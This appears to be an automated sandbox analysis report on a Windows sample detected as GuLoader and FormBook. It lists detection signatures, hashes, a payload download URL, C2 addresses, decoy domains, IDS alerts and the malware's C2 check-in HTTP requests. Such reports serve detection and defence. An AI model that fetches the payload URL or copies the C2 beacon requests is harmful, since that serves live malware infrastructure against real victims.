Windows Analysis Report
aSsc9zh1ex.exe

Overview

General Information

Sample Name: aSsc9zh1ex.exe
Analysis ID: 625008
MD5: d5e55a57372bcad45fbb260105179caf
SHA1: 9b1935a927c072dd31017362ff1739bf1ea2aaf7
SHA256: 3c27c2aa1bc826faa65ab4038eb385cabd6db50108410e6f674d455aa1dc5532
Infos:

Detection

FormBook, GuLoader
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
System process connects to network (likely due to code injection or exploit)
Yara detected GuLoader
Snort IDS alert for network traffic
Sample uses process hollowing technique
Maps a DLL or memory area into another process
Tries to detect Any.run
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Performs DNS queries to domains with low reputation
Modifies the prolog of user mode functions (user mode inline hooks)
Self deletion via cmd delete
Queues an APC in another process (thread injection)
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Tries to resolve many domain names, but no domain seems valid
Uses 32bit PE files
Yara signature match
May sleep (evasive loops) to hinder dynamic analysis
Contains functionality to shutdown / reboot the system
Uses code obfuscation techniques (call, push, ret)
PE file contains sections with non-standard names
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Found dropped PE file which has not been started or loaded
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Contains functionality for execution timing, often used to detect debuggers
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Sample file is different than original file name gathered from version info
PE file contains strange resources
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Checks if the current process is being debugged
PE file contains more sections than normal
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality for read data from the clipboard

Classification

AV Detection
barindex
Found malware configuration
Source: 00000007.00000000.41769049306.0000000001660000.00000040.00000400.00020000.00000000.sdmp Malware Configuration Extractor: GuLoader {"Payload URL": "http://barsam.com.au/bin_QuCucbUMda229.bin"}
Source: 0000000E.00000002.46595730295.00000000043D0000.00000040.10000000.00040000.00000000.sdmp Malware Configuration Extractor: FormBook {"C2 list": ["www.shantelleketodietofficial.site/wn19/"], "decoy": ["intelios.xyz", "fungismartgrid.com", "wrsngh.com", "golatrak.com", "revboxx.com", "projectduckling.com", "yiwuanyi.com", "bellaigo.com", "rnrr.xyz", "dentalimplantsservicelk.com", "helixsaleep.com", "hokasneakeruse.xyz", "threads34.store", "ayanaslifeinmalaysia.com", "thebeautystore.store", "99221.net", "mc3.xyz", "coconsj.store", "abstractmouse.com", "bctp.xyz", "sura.ooo", "paradisetrippielagoon.com", "usnahrpc.com", "kbcoastalproperties.com", "whiskeyjr.com", "liesdevocalist.store", "schnellekreditfinanz.com", "katraderphotography.com", "guizhouwentuo.com", "tfp3gfekbrb9cx99.xyz", "reionsbank.com", "edwardfran.com", "grigorous.com", "linqxw.com", "proplanvetsdirect.com", "zildaalckmin.net", "herbalsfixng.xyz", "gpusforfun.com", "terra-stations.money", "anytoearn.com", "borneadomicile.com", "dtmkwd.sbs", "taakyif.com", "perrobravostudio.com", "limba6lamb.xyz", "gluideline.com", "travelchanel3d.com", "group-gr.com", "qcrcmh.com", "dujh.xyz", "screensunshincoust.com", "cnrhome.com", "getsuzamtir.xyz", "baseballportalusa.com", "laiwu-yulu.com", "repaircilinic.com", "nelvashop.com", "2228.wtf", "clickleaser.com", "jpfzaojyn.sbs", "tandelawnmaintenance.com", "actu-infomail.com", "m-a-a.xyz", "friendlyneighborholdings.com"]}
Multi AV Scanner detection for submitted file
Source: aSsc9zh1ex.exe Virustotal: Detection: 37% Perma Link
Source: aSsc9zh1ex.exe Metadefender: Detection: 14% Perma Link
Source: aSsc9zh1ex.exe ReversingLabs: Detection: 34%
Yara detected FormBook
Source: Yara match File source: 0000000A.00000000.42010338948.000000001441C000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.46595730295.00000000043D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000000.42080260452.000000001441C000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.42265914211.000000001D3A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.46593481417.0000000000530000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.42240670582.00000000000A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.46596157164.0000000004400000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Uses 32bit PE files
Source: aSsc9zh1ex.exe Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
Source: aSsc9zh1ex.exe Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Source: Binary string: D:\SourceCode\GC3.UserExperienceImprovement\production_V4.2\Service\ServiceSDK\Release\UserExperienceImprovementPlugin\AsSQLHelper.pdb source: AsSQLHelper.dll.1.dr
Source: Binary string: D:\SourceCode\GC3.Overclocking\production_V4.2\Service\ServiceSDK\Release\ThrottlePlugin\AEGISIIINVHelper.pdb source: AEGISIIINVHelper.dll.1.dr
Source: Binary string: mshtml.pdb source: aSsc9zh1ex.exe, 00000007.00000001.41771865753.0000000000649000.00000008.00000001.01000000.00000005.sdmp
Source: Binary string: wntdll.pdbUGP source: aSsc9zh1ex.exe, 00000007.00000002.42268320726.000000001D710000.00000040.00000800.00020000.00000000.sdmp, aSsc9zh1ex.exe, 00000007.00000002.42269890824.000000001D83D000.00000040.00000800.00020000.00000000.sdmp, aSsc9zh1ex.exe, 00000007.00000003.41895267490.000000001D55D000.00000004.00000800.00020000.00000000.sdmp, aSsc9zh1ex.exe, 00000007.00000003.41890350295.000000001D3AB000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 0000000E.00000002.46597015234.0000000004630000.00000040.00000800.00020000.00000000.sdmp, rundll32.exe, 0000000E.00000002.46598617153.000000000475D000.00000040.00000800.00020000.00000000.sdmp, rundll32.exe, 0000000E.00000003.42246206237.0000000004483000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 0000000E.00000003.42240222700.00000000042D2000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: aSsc9zh1ex.exe, aSsc9zh1ex.exe, 00000007.00000002.42268320726.000000001D710000.00000040.00000800.00020000.00000000.sdmp, aSsc9zh1ex.exe, 00000007.00000002.42269890824.000000001D83D000.00000040.00000800.00020000.00000000.sdmp, aSsc9zh1ex.exe, 00000007.00000003.41895267490.000000001D55D000.00000004.00000800.00020000.00000000.sdmp, aSsc9zh1ex.exe, 00000007.00000003.41890350295.000000001D3AB000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, rundll32.exe, 0000000E.00000002.46597015234.0000000004630000.00000040.00000800.00020000.00000000.sdmp, rundll32.exe, 0000000E.00000002.46598617153.000000000475D000.00000040.00000800.00020000.00000000.sdmp, rundll32.exe, 0000000E.00000003.42246206237.0000000004483000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 0000000E.00000003.42240222700.00000000042D2000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: rundll32.pdb source: aSsc9zh1ex.exe, 00000007.00000003.42237635887.0000000001B32000.00000004.00000020.00020000.00000000.sdmp, aSsc9zh1ex.exe, 00000007.00000002.42241289508.0000000000120000.00000040.10000000.00040000.00000000.sdmp, aSsc9zh1ex.exe, 00000007.00000003.42235969161.0000000001B24000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: rundll32.pdbGCTL source: aSsc9zh1ex.exe, 00000007.00000003.42237635887.0000000001B32000.00000004.00000020.00020000.00000000.sdmp, aSsc9zh1ex.exe, 00000007.00000002.42241289508.0000000000120000.00000040.10000000.00040000.00000000.sdmp, aSsc9zh1ex.exe, 00000007.00000003.42235969161.0000000001B24000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: mshtml.pdbUGP source: aSsc9zh1ex.exe, 00000007.00000001.41771865753.0000000000649000.00000008.00000001.01000000.00000005.sdmp
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 1_2_00406850 FindFirstFileW,FindClose, 1_2_00406850
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 1_2_00405C26 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose, 1_2_00405C26
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 1_2_0040290B FindFirstFileW, 1_2_0040290B
Found inlined nop instructions (likely shell or obfuscated code)
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4x nop then pop esi 14_2_0054730D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4x nop then pop ebx 14_2_00537B1C

Networking
barindex
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe Network Connect: 68.65.122.211 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 23.227.38.74 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 3.64.163.50 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 41.203.18.177 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 192.64.117.165 80 Jump to behavior
Snort IDS alert for network traffic
Source: Traffic Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49768 -> 41.203.18.177:80
Source: Traffic Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49768 -> 41.203.18.177:80
Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49768 -> 41.203.18.177:80
Source: Traffic Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49776 -> 23.227.38.74:80
Source: Traffic Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49776 -> 23.227.38.74:80
Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49776 -> 23.227.38.74:80
Performs DNS queries to domains with low reputation
Source: DNS query: www.hokasneakeruse.xyz
Source: DNS query: www.rnrr.xyz
Source: DNS query: www.rnrr.xyz
Source: DNS query: www.rnrr.xyz
Source: DNS query: www.rnrr.xyz
Source: DNS query: www.rnrr.xyz
Source: DNS query: www.rnrr.xyz
Source: DNS query: www.intelios.xyz
Source: DNS query: www.herbalsfixng.xyz
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: www.shantelleketodietofficial.site/wn19/
Source: Malware configuration extractor URLs: http://barsam.com.au/bin_QuCucbUMda229.bin
Tries to resolve many domain names, but no domain seems valid
Source: unknown DNS traffic detected: query: www.reionsbank.com replaycode: Name error (3)
Source: unknown DNS traffic detected: query: www.kbcoastalproperties.com replaycode: Name error (3)
Source: unknown DNS traffic detected: query: www.thebeautystore.store replaycode: Name error (3)
Source: unknown DNS traffic detected: query: www.rnrr.xyz replaycode: Server failure (2)
Source: unknown DNS traffic detected: query: www.taakyif.com replaycode: Name error (3)
Source: unknown DNS traffic detected: query: www.gpusforfun.com replaycode: Name error (3)
Source: unknown DNS traffic detected: query: www.liesdevocalist.store replaycode: Server failure (2)
Source: unknown DNS traffic detected: query: www.ayanaslifeinmalaysia.com replaycode: Server failure (2)
Source: unknown DNS traffic detected: query: www.shantelleketodietofficial.site replaycode: Name error (3)
Source: unknown DNS traffic detected: query: www.sura.ooo replaycode: Name error (3)
Source: unknown DNS traffic detected: query: www.perrobravostudio.com replaycode: Name error (3)
Source: unknown DNS traffic detected: query: www.hokasneakeruse.xyz replaycode: Name error (3)
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: xneeloZA xneeloZA
Source: Joe Sandbox View ASN Name: NAMECHEAP-NETUS NAMECHEAP-NETUS
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /wn19/?jZf=NS202dJbEEETcB12VfvBfMMdjzaMJ2P7TP19ar/APX8BBmPLqx20W3tmhoszgkcRlb4O&1biX=C2MPnN HTTP/1.1Host: www.fungismartgrid.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /wn19/?jZf=QQL+SjwgUyPYxJnw2qa+Hze/zpoAw1vY2ZXVt5QHdkoKCL+B47r8V4uCmI0quTqEBnpn&1biX=C2MPnN HTTP/1.1Host: www.intelios.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /wn19/?jZf=/aPRIOivZv/SK3yyBSrwMHS3aEcDnGoJdVwaw0Jv+PFvpIBjQ3dFVdba2CvjMIDrv82h&1biX=C2MPnN HTTP/1.1Host: www.herbalsfixng.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /wn19/?jZf=VPEU4GtrlSiNcAkb3jQiBQiB6wsnkRv+1lt8CI/dwo4hrc1cBv2ecJ2q6A5CexHOXEVq&1biX=C2MPnN HTTP/1.1Host: www.schnellekreditfinanz.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /wn19/?jZf=74kz/+Omydv/tJV+ps5/T47bI5nxKh+DjdkrvIsUcwHn/m5f3NJjyQUUG1A7gP1GNjyQ&k0=p8cH HTTP/1.1Host: www.nelvashop.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /wn19/?jZf=rv1HgXCmNvTRWnk0t/PWMZTArWSxwY6VToXu23C5wd0SYVqo5hbnUnFufPtPTohMYlmc&k0=p8cH HTTP/1.1Host: www.threads34.storeConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 41.203.18.177 41.203.18.177
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET /bin_QuCucbUMda229.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: barsam.com.auCache-Control: no-cache
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 12 May 2022 08:45:22 GMTServer: ApacheContent-Length: 196Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 12 May 2022 08:49:05 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeVary: Accept-EncodingX-Sorting-Hat-PodId: 178X-Sorting-Hat-ShopId: 62108663987X-Dc: gcp-europe-west1X-Request-ID: 550f7f4f-456b-4f4f-8965-3ea51e57b588X-XSS-Protection: 1; mode=blockX-Download-Options: noopenX-Content-Type-Options: nosniffX-Permitted-Cross-Domain-Policies: noneCF-Cache-Status: DYNAMICServer: cloudflareCF-RAY: 70a1e629cab2915e-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 31 34 31 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 66 65 72 72 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 65 76 65 72 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 41 63 63 65 73 73 20 64 65 6e 69 65 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 2a 7b 62 6f 78 2d 73 69 7a 69 6e 67 3a 62 6f 72 64 65 72 2d 62 6f 78 3b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 48 65 6c 76 65 74 69 63 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 31 46 31 46 31 3b 66 6f 6e 74 2d 73 69 7a 65 3a 36 32 2e 35 25 3b 63 6f 6c 6f 72 3a 23 33 30 33 30 33 30 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 7d 62 6f 64 79 7b 70 61 64 64 69 6e 67 3a 30 3b 6d 61 72 67 69 6e 3a 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 32 2e 37 72 65 6d 7d 61 7b 63 6f 6c 6f 72 3a 23 33 30 33 30 33 30 3b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 31 70 78 20 73 6f 6c 69 64 20 23 33 30 33 30 33 30 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 31 72 65 6d 3b 74 72 61 6e 73 69 74 69 6f 6e 3a 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 20 30 2e 32 73 20 65 61 73 65 2d 69 6e 7d 61 3a 68 6f 76 65 72 7b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 2d 63 6f 6c 6f 72 3a 23 41 39 41 39 41 39 7d 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 38 72 65 6d 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 3b 6d 61 72 67 69 6e 3a 30 20 30 20 31 2e 34 72 65 6d 20 30 7d 70 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 35 72 65 6d 3b 6d 61 72 67 69 6e 3a 30 7d 2e 70 61 67 65 7b 70 61 64 64 69 6e 67 3a 34 72 65 6d 20 33 2e 35 72 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 76 68 3b 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 63 6f 6c 75 6d 6e 7d 2e 74 65 78 74 2d 63 6f 6e 74 61 69 6e 65 72 2d 2d 6d 61 69 6e 7b 66 6c 65 78 3a 31 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 61 6c Data Ascii: 141d<!DOCTYPE html><html lang="en"><head> <meta charset="utf-8" /> <meta
Source: global traffic HTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 12 May 2022 08:49:26 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeVary: Accept-EncodingX-Sorting-Hat-PodId: 152X-Sorting-Hat-ShopId: 60890513561X-Dc: gcp-europe-west1X-Request-ID: 02e2ed5e-cb87-4eff-bfdf-9330f6164dc4X-Download-Options: noopenX-Content-Type-Options: nosniffX-Permitted-Cross-Domain-Policies: noneX-XSS-Protection: 1; mode=blockCF-Cache-Status: DYNAMICServer: cloudflareCF-RAY: 70a1e6a9ab9f900a-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 31 34 31 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 66 65 72 72 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 65 76 65 72 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 41 63 63 65 73 73 20 64 65 6e 69 65 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 2a 7b 62 6f 78 2d 73 69 7a 69 6e 67 3a 62 6f 72 64 65 72 2d 62 6f 78 3b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 48 65 6c 76 65 74 69 63 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 31 46 31 46 31 3b 66 6f 6e 74 2d 73 69 7a 65 3a 36 32 2e 35 25 3b 63 6f 6c 6f 72 3a 23 33 30 33 30 33 30 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 7d 62 6f 64 79 7b 70 61 64 64 69 6e 67 3a 30 3b 6d 61 72 67 69 6e 3a 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 32 2e 37 72 65 6d 7d 61 7b 63 6f 6c 6f 72 3a 23 33 30 33 30 33 30 3b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 31 70 78 20 73 6f 6c 69 64 20 23 33 30 33 30 33 30 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 31 72 65 6d 3b 74 72 61 6e 73 69 74 69 6f 6e 3a 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 20 30 2e 32 73 20 65 61 73 65 2d 69 6e 7d 61 3a 68 6f 76 65 72 7b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 2d 63 6f 6c 6f 72 3a 23 41 39 41 39 41 39 7d 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 38 72 65 6d 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 3b 6d 61 72 67 69 6e 3a 30 20 30 20 31 2e 34 72 65 6d 20 30 7d 70 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 35 72 65 6d 3b 6d 61 72 67 69 6e 3a 30 7d 2e 70 61 67 65 7b 70 61 64 64 69 6e 67 3a 34 72 65 6d 20 33 2e 35 72 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 76 68 3b 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 63 6f 6c 75 6d 6e 7d 2e 74 65 78 74 2d 63 6f 6e 74 61 69 6e 65 72 2d 2d 6d 61 69 6e 7b 66 6c 65 78 3a 31 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 61 6c Data Ascii: 141d<!DOCTYPE html><html lang="en"><head> <meta charset="utf-8" /> <meta
Source: unknown TCP traffic detected without corresponding DNS query: 93.184.220.29
Source: unknown TCP traffic detected without corresponding DNS query: 93.184.220.29
Source: unknown TCP traffic detected without corresponding DNS query: 93.184.220.29
Source: unknown TCP traffic detected without corresponding DNS query: 93.184.220.29
Source: unknown TCP traffic detected without corresponding DNS query: 93.184.220.29
Source: unknown TCP traffic detected without corresponding DNS query: 93.184.220.29
Source: unknown TCP traffic detected without corresponding DNS query: 93.184.220.29
Source: unknown TCP traffic detected without corresponding DNS query: 93.184.220.29
Source: unknown TCP traffic detected without corresponding DNS query: 93.184.220.29
Source: unknown TCP traffic detected without corresponding DNS query: 93.184.220.29
Source: unknown TCP traffic detected without corresponding DNS query: 93.184.220.29
Source: unknown TCP traffic detected without corresponding DNS query: 93.184.220.29
Source: unknown TCP traffic detected without corresponding DNS query: 93.184.220.29
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 9.9.9.9
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 9.9.9.9
Source: unknown UDP traffic detected without corresponding DNS query: 9.9.9.9
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 9.9.9.9
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 9.9.9.9
Source: unknown UDP traffic detected without corresponding DNS query: 9.9.9.9
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 9.9.9.9
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: aSsc9zh1ex.exe, 00000007.00000003.42236588929.0000000001AFF000.00000004.00000020.00020000.00000000.sdmp, aSsc9zh1ex.exe, 00000007.00000002.42242910280.0000000001AFF000.00000004.00000020.00020000.00000000.sdmp, aSsc9zh1ex.exe, 00000007.00000002.42242442398.0000000001AB8000.00000004.00000020.00020000.00000000.sdmp, aSsc9zh1ex.exe, 00000007.00000003.42236524676.0000000001AFA000.00000004.00000020.00020000.00000000.sdmp, aSsc9zh1ex.exe, 00000007.00000002.42242846036.0000000001AFA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://barsam.com.au/bin_QuCucbUMda229.bin
Source: aSsc9zh1ex.exe, 00000007.00000003.42236524676.0000000001AFA000.00000004.00000020.00020000.00000000.sdmp, aSsc9zh1ex.exe, 00000007.00000002.42242846036.0000000001AFA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://barsam.com.au/bin_QuCucbUMda229.bin?
Source: aSsc9zh1ex.exe, 00000007.00000003.42236524676.0000000001AFA000.00000004.00000020.00020000.00000000.sdmp, aSsc9zh1ex.exe, 00000007.00000002.42242846036.0000000001AFA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://barsam.com.au/bin_QuCucbUMda229.bing
Source: aSsc9zh1ex.exe, 00000001.00000002.41961843116.0000000000788000.00000004.00000001.01000000.00000003.sdmp, AsSQLHelper.dll.1.dr, AEGISIIINVHelper.dll.1.dr, wxbase30u_xml_gcc_custom.dll.1.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: aSsc9zh1ex.exe, 00000001.00000002.41961843116.0000000000788000.00000004.00000001.01000000.00000003.sdmp, AsSQLHelper.dll.1.dr, AEGISIIINVHelper.dll.1.dr, wxbase30u_xml_gcc_custom.dll.1.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
Source: AsSQLHelper.dll.1.dr, AEGISIIINVHelper.dll.1.dr String found in binary or memory: http://crl.globalsign.com/gsextendcodesignsha2g3.crl0
Source: AsSQLHelper.dll.1.dr, AEGISIIINVHelper.dll.1.dr String found in binary or memory: http://crl.globalsign.com/root-r3.crl0b
Source: AsSQLHelper.dll.1.dr, AEGISIIINVHelper.dll.1.dr String found in binary or memory: http://crl.globalsign.com/root.crl0G
